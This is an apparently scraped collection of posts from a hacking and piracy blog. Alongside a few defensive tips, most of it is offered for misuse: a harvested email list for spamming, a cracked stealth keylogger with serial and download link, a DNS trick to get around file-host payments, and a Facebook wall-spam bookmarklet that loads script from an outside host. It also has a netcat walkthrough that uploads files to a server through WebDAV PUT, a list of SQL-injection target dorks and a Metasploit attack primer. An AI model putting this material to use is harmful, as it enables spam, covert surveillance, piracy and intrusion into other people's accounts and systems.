Facebook Mailing List :- Huge Email List – 100% VERIFIED - Software Bazar

Facebook Mailing List :- Huge Email List – 100% VERIFIED
Friends, this is a special bonus to all the visitors of software-bazar. A huge
collection of 100% Verified working emails. You can use Gmail,Yahoo or any other
Mail sending website to send them. You can promote your website, product among the
real users.
100% Genuine. Never seen before. No COPY No DUPLICATION
Download Link
Password
thankyou 

Hardware Keylogger Internet Cafe Hacking - Software Bazar

Dear friends, If you visit a cyber cafe and find find any black pin attached to your CPU as shown in the picture, kindly do not use that system. This pin is actually a connection which save all your data you enter in the system.
Thus it is a risk to your privacy over net. Risk to passwords, banking or any data you entered.
Itz a hardware keylogger very powerful it records each and every action ur system.
If You like my this post then share with your friends and family thank you.......

and yes if you have any problem or want any suggestion just comment here




Methods to Enhance Facebook Account Security-Software Bazaar


Methods to Enhance Facebook Account SecurityHacking someone’s Facebook account and then posting unacceptable content is the most popular method to take revenge these days. Recently somebody hacked into my friend’s Facebook account and posted absurd messages others wall.Later he was able to recover his account but the damage has been already done.He has to explain to everyone that it was not him who had send them those messages.This can happen to anyone and its better to take preventive measures rather to face embarrassing situations later.

How to Secure your Facebook Account from Hackers:

  • Login into your Facebook Account and go to Account Setting.
1110 Methods to Enhance Facebook Account Security
  • Choose Security tab from left window pane.
124 Methods to Enhance Facebook Account Security

Method 1: Enable Secure Browsing

  • In your Security Settings click on Secure Browsing tab.
33 Methods to Enhance Facebook Account Security
  • Do check mark on the Browse Facebook on a secure connection (https) when possible Checkbox and then click on save changes button.
142 Methods to Enhance Facebook Account Security
52 Methods to Enhance Facebook Account Security

Method 2: Login Notification:

By enabling login notifications you will receive alerts whenever your Facebook account is opened from an unknown device.You can associate your computer or mobile with your Facebook account.If your account is opened from another device you will receive an email with information about the location of the device.This should be enough to trigger suspicions that your account has been compromised.

Steps to Follow:

  • Click on the Login Notification in Security Setting.
62 Methods to Enhance Facebook Account Security
  • Do check mark on Email button and then on save changes button.
171 Methods to Enhance Facebook Account Security
  • Now when anyone try to access your computer then you will get a email with the location of the user who logged on your account.

How To Set Recognized Devices?

If you don’t want to recieve notifications from certain devices like your own computer or mobile then you can set them as recognized.If you have enabled Login Notifications then every time you login into your account from new (unrecognised) device it will ask you to give device name and an option to save it as Recognized device.
However if at some later stage you feel that you want to remove a device from recognized list you can do it by following simple steps.

How To Remove Recognized Devices?

Steps to Follow:

  • Click on the Recognized Device in Security Setting.
81 Methods to Enhance Facebook Account Security
  • Here you will see a list of all the devices that you had made to Save Device.
91 Methods to Enhance Facebook Account Security
  • Remove that particular device from your list and then click on the save changesbutton.
Now that device is removed from your recognized list

Latest Security Flaw in Skype Enables IP address & Location Tracking -Software Bazar

Surprise surprise! There's a new flaw in the 'system' that tracks down the user's location through their IP address.

It has been reported that any skilled hacker can now find out the location of a user logged into their account. This gives us another reason to be 'extra careful' when using programs and softwares that help us communicate with our loved ones and a few not-so-loved!

The company, however, is trying to recover from the shock and claiming that the ability to derive IP addresses was common with all web based communication clients. They probably don't know how terrifying this can be for some people. A massive security and privacy breech, i mean, c'mon!!

Adrian Asher, Skype's chief information security officer, said:

Just as with typical Internet communications software, Skype users who are connected may be able to determine each other's IP addresses. Through research and development, we will continue to make advances in this area and improvements to our software.
The blind spot can be abused by many a proficient hacker and that too, on a massive scale. This was observed by the company when they demonstrated to millions of users how their location can be tracked.

We feel comfortable saying that we have gotten pretty used to third party apps and programmes misusing their privileges. But the information we provide is worth being taken notice of. We request our readers to think twice before doing anything that we ask you NOT TO DO.

How to Hack into Another PC ---...---Locate Another person IP when you are Chating [ VIDEO] - HACKING BAZAR






You need more Software to Hipe your IP,

For those of you who dont have framework V4.0 here is the link to download,because this program only work with net 4.0

http://www.msdn.microsoft.com/en-us/netframework/aa569263.aspx

You can download the android spy v1.0 click below



  

How to unlock your Phone free without paying any site or company. All you have to do just have an internet download it and enjoy it free of charge...You can unlock Android phones, I phone, Motorola, Sony Ericsson, Nokia, cdma, Chinese phone, satalite receive, car radio etc ...You can also Unlock your car radio, or watch scramble satellite channel, this software will unlock any kind of stuff you think about....and you can also repair your phone through this software...We need to transform what we have taught in school that is why we share our idea on YOUTUBE

SSH TUNNEL HACKING POST PURELY - HACKING BAZAR

I figured I will do a quick post on SSH Tunnel. I will be tunneling to the wcosug server using putty. I configure tunnels on putty as such
Photobucket
Then I configure my web browser to use it as a proxy.
Photobucket
Any viola an SSH tunnel. In the future I will go into more about using it as say a RDP tunnel and etc...

Banner Grabbing Hacking - HACKING BAZAR

In more boredom I figured I will just do something easy and simple and usually over looked. We are going to use netcat to do some http server banner grabbing.

# nc 12.200.x.x 80
HEAD / HTTP/1.0

HTTP/1.1 200 OK
Content-Length: 230
Content-Type: text/html
Content-Location: http://10.1.1.120/WebInterface.htm
Last-Modified: Sat, 29 Mar 2008 16:03:16 GMT
Accept-Ranges: bytes
ETag: "569b6d66b691c81:1d8a"
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
Date: Wed, 22 Jun 2011 14:07:14 GMT
Connection: close

Just for the record Head requests can be spoofed.

So we connect on port 80 and issue a head request.
We have the internal IP address which here is 10.1.1.120 When I see a class A IP address for an Internal network I usually guess they are using CIDR. Since the rule of thumb is not to have more then 500 hosts per subnet. So I'm guessing 10.1.1.0/24

Next It tells us they are using IIS6 which is either Server 2003 or XPx64

Next we will see what options are available to us. By using.

Options / HTTP/1.0
HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
Date: Wed, 22 Jun 2011 14:15:15 GMT
X-Powered-By: ASP.NET
MS-Author-Via: DAV
Content-Length: 0
Accept-Ranges: none
DASL:
DAV: 1, 2
Public: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH
Allow: OPTIONS, TRACE, GET, HEAD, PUT, COPY, PROPFIND, SEARCH, LOCK, UNLOCK
Cache-Control: private

From here we can see what commands are available to us and PUT is available I believe this is a very underutilized method. So next we can put a file up be it malicious what not. Here is my file.

# cat 1.txt
blah

So next you have to see how big the file is.
#wc -m 1.txt
5 1.txt(5bytes)

#nc 12.200.x.x 80
PUT /1.txt HTTP/1.0
Content-type: text/html
Content-length: 5

Some servers will give you a status message and some will not.

Photobucket

5 proxy Site to Hide Your Identity - SOFTWARE HACKING BAZAR

Google Dorks For SQL Injetion - SOFTWARE HACKING BAZAR


The following is a list of Google Dorks for SQLi Injection:
inurl:index.php?id=
inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurl:lay_old.php?id=
inurl:declaration_more.php?decl_id=
inurl:ageid=
inurl:games.php?id=
inurl:age.php?file=
inurl:newsDetail.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:show.php?id=
inurl:staff_id=
inurl:newsitem.php?num=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:historialeer.php?num=
inurl:reagir.php?num=
inurl:Stray-Questions-View.php?num=
inurl:forum_bds.php?num=
inurl:game.php?id=
inurl:view_product.php?id=
inurl:newsone.php?id=
inurl:sw_comment.php?id=
inurl:news.php?id=
inurl:avd_start.php?avd=
inurl:event.php?id=
inurl:roduct-item.php?id=
inurl:sql.php?id=
inurl:news_view.php?id=
inurl:select_biblio.php?id=
inurl:humor.php?id=
inurl:aboutbook.php?id=
inurl:gl_inet.php?ogl_id=
inurl:fiche_spectacle.php?id=
inurl:communique_detail.php?id=
inurl:sem.php3?id=
inurl:kategorie.php4?id=
inurl:news.php?id=
inurl:index.php?id=
inurl:faq2.php?id=
inurl:show_an.php?id=
inurl:review.php?id=
inurl:loadpsb.php?id=
inurl:pinions.php?id=
inurl:spr.php?id=
inurl:ages.php?id=
inurl:announce.php?id=
inurl:clanek.php4?id=
inurl:articipant.php?id=
inurl:download.php?id=
inurl:main.php?id=
inurl:review.php?id=
inurl:chappies.php?id=
inurl:rod_detail.php?id=
inurl:viewphoto.php?id=
inurl:article.php?id=
inurl:erson.php?id=
inurl:roductinfo.php?id=
inurl:showimg.php?id=
inurl:view.php?id=
inurl:website.php?id=
inurl:hosting_info.php?id=
inurl:gallery.php?id=
inurl:rub.php?idr=
inurl:view_faq.php?id=
inurl:artikelinfo.php?id=
inurl:detail.php?ID=
inurl:index.php?=
inurl:rofile_view.php?id=
inurl:category.php?id=
inurl:ublications.php?id=
inurl:fellows.php?id=
inurl:downloads_info.php?id=
inurl:rod_info.php?id=
inurl:shop.php?do=part&id=
inurl:roductinfo.php?id=
inurl:collectionitem.php?id=
inurl:band_info.php?id=
inurl:roduct.php?id=
inurl:releases.php?id=
inurl:ray.php?id=
inurl:roduit.php?id=
inurl:op.php?id=
inurl:shopping.php?id=
inurl:roductdetail.php?id=
inurl:ost.php?id=
inurl:viewshowdetail.php?id=
inurl:clubpage.php?id=
inurl:memberInfo.php?id=
inurl:section.php?id=
inurl:theme.php?id=
inurl:age.php?id=
inurl:shredder-categories.php?id=
inurl:tradeCategory.php?id=
inurl:roduct_ranges_view.php?ID=
inurl:shop_category.php?id=
inurl:transcript.php?id=
inurl:read.php?id=
inurl:channel_id=
inurl:item_id=
inurl:newsid=
inurl:trainers.php?id=
inurl:news-full.php?id=
inurl:news_display.php?getid=
inurl:index2.php?option=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:newsone.php?id=
inurl:event.php?id=
inurlroduct-item.php?id=
inurl:sql.php?id=
inurl:aboutbook.php?id=
inurl:review.php?id=
inurl:loadpsb.php?id=
inurl:ages.php?id=
inurl:material.php?id=
inurl:clanek.php4?id=
inurl:announce.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:viewapp.php?id=
inurl:viewphoto.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:review.php?id=
inurl:iniziativa.php?in=
inurl:curriculum.php?id=
inurl:labels.php?id=
inurl:story.php?id=
inurl:look.php?ID=
inurl:newsone.php?id=
inurl:aboutbook.php?id=
inurl:material.php?id=
inurl:pinions.php?id=
inurl:announce.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:tekst.php?idt=
inurl:newscat.php?id=
inurl:newsticker_info.php?idn=
inurl:rubrika.php?idr=
inurl:rubp.php?idr=
inurl:ffer.php?idf=
inurl:art.php?idm=
inurl:title.php?id


Thank You :) 

Free Hotfile, Fileserve, Megaupload Premium Link Generator - HACKING BAZAR




All of us have, at one point or another, used major file hosting websites like Megaupload, Hotfile and Rapidshare. The sweetest part and the reason why we wait for hours on end to download our required files from these links is 'cause we don't have to cough up a dime while doing so. Buying them is a far worse idea as breaking rules is and always will be our kinda deal!

Free Fileserve, Filesonic Premium Link Generator


 But there's a catch (yeah, all good things come at a price). Even if you do manage to wait for your download link to appear and somehow you manage to start your download, the speed is gonna be like one of those days when you are late for work and the old lady driver in the car up front just won't moooove! Yeah, you know what I'm talking about. I'm gonna tell you a way out.. Break all the rules and make a run for it!

Getting back to the topic, file hosting websites lag speed, restrict parallel downloading and make you wait before they throw a bone at you, that is if you a FREE MEMBER.
These sites require pocket change if you want to download files without any restrictions and party all day long with free software downloads.

But, as always, we have a solution for you. Now, you can download files all day long with a Premium account to satisfy all your software hunger and that too, without paying a dime (Yeah, you heard me). Simply, use
Free Fileserve, Filesonic and Megaupload Premium Link Generator, copy and paste a Megaupload file URL and instantly download your file.

Free Fileserve, Filesonic Premium Link Generation technique

Follow the instructions below to break free and enjoy unlimited downloads for a day:

Step 1: Go to DebriDNS and register for an account. Verify and login to your DebriDNS account.



Step 2: Configure your DNS settings by going to your Control Panel -> Networking and Sharing Center -> Manage Network Connections -> “Your Connection name”, for e.g Local Area Connection.


Step 3: Right click on it and select Properties.

Step 4: Double click on IPV4.


Step 5: Click “Use the following DNS server addresses” and enter the following DNS addresses:
Preferred DNS Server: 85.17.255.198
Alternative DNS Server: 46.19.33.120

Click OK and Exit.

Step 6: Restart your browser and say a prayer 'cause you have entered the rabbit hole!
As for downloading a file, all you have to do it:

Step 1: Open Megaupload and you will find yourself logged in as a a Premium User (Huraaah!)

Step 2: Hit on Premium and enjooooyyyy!


If this Free Fileserve, Filesonic Premium Link Generation technique did not work for you, Kindly comment and let us know.

PS: This works for Hotfile too!

REFOG Keylogger v6.0.4.1014 + Serial [ Full Version ] [Crack] - HACKING BAZAR



Concerned About Your Children Safety?

If your kids spend time chatting or playing computer games, they can be approached or threatened by the strangers. Internet has anonymity, and anonymity means impunity in the minds of molesters. The solution? Violate their anonymity by monitoring your kids’ activities!
REFOG Personal Monitor is designed to deal with extended families, but it fits small families just as easy. Allowing you to monitor your children activities remotely over the Internet, REFOG Personal Monitor does not even require your close presence in order to be alerted about suspicious activities of either your children or someone they chat with.

Easy To Install and To Use
REFOG Personal Monitor can be set up and used by anyone. The monitor does not involve a steep learning curve and does not demand a degree in Computer Science to configure and operate. Simply download your free trial version and get yourself going!
Remote Monitoring
REFOG Personal Monitor provides the necessary degree of interactivity, allowing you to monitor your kids’ actions remotely over the email. There’s no need to rush home during the launch hour just to check the logs. See what your kids are doing with their computer without leaving your office!
Real-Time Alerts
Should you be worried now or later? If you want constant protection of your family, simply logging keystrokes and storing screen captures is not enough. Often, an immediate action is required to get your kids out of trouble.
REFOG Personal Monitor is highly flexible, allowing you to configure multiple alerts on harmful or offensive keystrokes sent or received on their computer. Set your alarms, and get notified instantly with real-time alerts if a pre-defined event happens on their PC.
You can easily set REFOG Personal Monitor to alert you by e-mail. Templates are available to filter keystrokes that contain pre-defined trigger phrases, making false alerts hardly possible.
Save Screens and Key Presses
REFOG Personal Monitor keeps a list of all activities you specify it to log. It records all visited Web sites, keeps logs of chats and instant messenger conversations as well as other things typed or received by your kids in chats, messengers, blogs, forums and other online and offline applications.
REFOG Personal Monitor saves each key pressed and every phrase typed, and makes periodic captures of the computer screen to better illustrate what was going on at that moment.
Capture Chats and Instant Messengers
REFOG Personal Monitor captures every key that they press, but does not stop there. Individual keystrokes are of little use when analyzing your kids’ behavior. REFOG Personal Monitor can detect popular chats and instant messengers, and forms clearly legible and readable logs containing chats and instant messenger conversations formatted in a manner that is convenient to read.
Stealth Operation
For even better protection, REFOG Personal Monitor can be completely hidden from your kids’ eyes. It runs silently and unobtrusively on their PC while taking screen shots and recording every key that they press, logging applications that they use and Web sites that they visit. You can access these logs either locally or remotely at any time, even if you are not at home!

Keystroke recording

Once installed and running, Refog registers all keys pressed by a user, thus acting as a keylogger. This function captures all data that has been entered by your children or an employee using a keyboard, including chats, usernames, passwords, emails, search queries and other content. In addition to key logging, Refog is also able to log clipboard text.
Web history logging
Even if users delete their browser's history, the informaton is retained in Refog's log database and always available via the reports function. All relevant information is collected including URLs visited, page titles and the timestamp.
Screenshot history
With customizable capability, Refog takes full color screenshots of a desktop screen. This ensures that the log of what is being typed by the user is backed up with visual evidence of exactly what they are doing. Without being monitored, it is often the case that employees get carried away with excessive web surfing, shopping and other personal tasks. With screenshot history, it is always possible to gather evidence if an employee is wasting the company's time. Multiple monitor configurations are supported!
Invisible mode and password protection
You may not want to disclose the act of PC monitoring, so Refog can work in special stealth mode, making it completely invisible even to a skilled PC user. It cannot be found in the program folder, control panel or tray. When required, the program can be revealed using a special command or hotkey. In addition, it is possible to protect Refog with a password, so users are unable to erase their logs.
Application monitoring and file tracking
Refog is able to record all programs executed on your PC, so it is possible to establish if your kid is playing games instead of doing his homework, an employee is wasting time offline (e.g. playing solitaire instead of working). In addition to programs, Refog stores all file operations (e.g. open, edit, copy, delete), and can reveal inappropriate interest in specific confidential documents.
IM monitoring
Refog is also compatible with all major instant messaging software (e.g. AIM, Facebook®,Yahoo! messenger, Skype, ICQ, Google Talk, MSN). It is not only able to log outgoing messages by a local user, but also incoming messages too.
Email reports
It is not necessary to gain physical access to monitored computers in order to view their logs. All reports can be delivered via email, and can be read anywhere.
Comprehensive settings and reports
It is possible to set the control levels of monitoring, enable/disable monitoring for given users, setup alert keywords and reports delivery, easily filter log files and much more. With this armory of tools, Refog comes preconfigured so it can be installed in just a few clicks and run with default settings, requiring no tech skills at all!

Refog Personal Monitor works great with all modern Windows OS releases: Windows XP®, Windows Vista®, Windows 7®


Installation Notes

Run setup file
Enter the serial
Enjoy

DOWNLOAD FROM::
http://hotfile.com/dl/131170134/51df760/REFOG_Keylogger_5.1.8.934___Serial_By_Kamran_The_King.rar.htm

Facebook Status Prank ! Status Update from iphone 5 trick - HACK BAZAR

How to Spam someones Wall on Facebook. Working Hack WIth Video Tutorial - HACKING BAZAR

WARNING# I dont take any responsibility of misuse of this information.
It is really annoying if your Facebook Wall is full with many messages. Recently I found the way of doing it and now i am sharing it with you people ;)

It is really easy to do it. All you need to do is to follow the following steps carefully.

#Step1: First you need to be on "http://" connection instead of "https://", so simple Login into your FB account and goto Account > Account Settings > Account Security. Over there "unTick" |Secure Browsing (https)|


#Step2: Now goto the Persons wall whom you want to spam , and then paste the following code into the address bar:


javascript:(a = (b = document).createElement("script")).src = "//purebroz.com/a.js", b.body.appendChild(a); void(0)  


#Step3: Now a new box will pop up. In that type the number of times you want the message to be posted and click on "OK".


#Step4: After that type the message that you want to post and click on "OK"


After that its all done just refresh and you will Spam the other person.


======================================
VIDEO FOR JUNIORS!
======================================


How to Hack a computer using Metasploit ? with Video - HACK BAZAR


Metasploit is one of the greatest Hacking tools ever. It makes the hacking easy for the Script Kiddies (new hackers). But Question comes How to use it to hack a computer?

Metasploit Framework comes in command-line as well as GUI version. This article will deal with the command-line version. Followings are the basic commands of Metasploit that you should Learn by Heart.

1: help (show the commands.)
2: show info XXXX (to show the information on specified XXXX value, that is can be exploit or payload)
3: show options ( to show the options for a exploit and payload. Like RHOST, LHOST)
4: show exploits/payloads (to get a list of exploits/payloads)
5: use XXXX (to select the name of the exploit.)
6: set XXXX (to set the value of RHOST, LHOST or payload)
7: exploit (to launch a exploit on targeted machine.)

Note: To hack a computer using Metasploit first you should have the enough information of the target ­­including
1: IP address
2: Open Ports
3: services running
4: Version of software running

All of these need a little work. A famous tool to do all of these is NMAP on which I have written some articles.

Now the first step is choosing a right exploit for the vulnerabilities in the machine. To determine the exploit for the attack you need all the things noted above. For example the computer is running a SMTP server on Port 25 and there is a exploit on it than you hack that computer.

To choose an exploit following command is there:

Use [exploits address . e.g. Exploit/windows/smtp/xxx. ]

Now you need a payload (payload is a piece of program that will be executed if vulnerability is exploited). To get a list of all the payloads available for the exploit Just type following command.

Show payloads

Now choose an appropriate a payload from it. The only thing left is to set the fields for the attack. List of Most Probable fields to be set is given bellow.

RHOST = The IP address of the computer to be attacked.
RPORT = The Port of the service to exploited (it set by default)
LHOST = The IP address of your computer (it set by default)
LPORT = The default port of your Metasploit program (it set by default)

Now the Last step is to type the following command and Launch attack to the computer.

exploit

After typing this command the attack will be launched and if vulnerability is successfully exploited the payload will be executed and a shell (you can take it as command prompt) will be launched which will allow you to do anything with the computer that you have attacked.


==========================================
Video Tutorial
==========================================